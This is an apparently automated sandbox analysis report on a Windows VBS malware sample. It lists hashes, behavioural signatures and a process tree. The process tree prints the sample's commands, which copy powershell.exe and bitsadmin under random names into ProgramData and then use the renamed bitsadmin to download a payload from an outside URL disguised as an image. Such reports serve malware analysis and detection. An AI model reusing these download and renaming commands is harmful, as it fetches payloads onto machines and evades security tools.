Analysis
-
max time kernel
4294180s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20220311-en -
submitted
24-03-2022 23:27
Static task
static1
Behavioral task
behavioral1
Sample
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs
Resource
win7-20220311-en
windows7_x64
0 signatures
0 seconds
General
-
Target
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs
-
Size
6KB
-
MD5
d7c45aaa2ec4c379c3590e85efd3e27c
-
SHA1
182d0dd1d7e8c4797b70550c1fa26d20e691df37
-
SHA256
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c
-
SHA512
b832b5d84d581d7bc9282cdcce3752d8423e0967a786c9c54601c270e9743267d57c0de68c0e5c97f51af3d1be040b341dc04f50e12c3e6700eb11282910c217
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1604 ZAblYWBin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 1616 wrote to memory of 1644 1616 WScript.exe 27 PID 1616 wrote to memory of 1644 1616 WScript.exe 27 PID 1616 wrote to memory of 1644 1616 WScript.exe 27 PID 1644 wrote to memory of 1100 1644 cmd.exe 29 PID 1644 wrote to memory of 1100 1644 cmd.exe 29 PID 1644 wrote to memory of 1100 1644 cmd.exe 29 PID 1644 wrote to memory of 1392 1644 cmd.exe 30 PID 1644 wrote to memory of 1392 1644 cmd.exe 30 PID 1644 wrote to memory of 1392 1644 cmd.exe 30 PID 1616 wrote to memory of 1604 1616 WScript.exe 31 PID 1616 wrote to memory of 1604 1616 WScript.exe 31 PID 1616 wrote to memory of 1604 1616 WScript.exe 31 PID 1616 wrote to memory of 1604 1616 WScript.exe 31
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zDygeqh.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZAblYWB*.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zDygeqh.exe3⤵PID:1100
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZAblYWB*.exe3⤵PID:1392
-
-
-
C:\ProgramData\ZAblYWBin.exe"C:\ProgramData\ZAblYWBin.exe" /transfer bHfBoa /download https://waybackwhenbycynthia.com/edikaso/09518900965/map.jpg C:\Users\Admin\AppData\Roaming\map.jpg2⤵
- Executes dropped EXE
PID:1604
-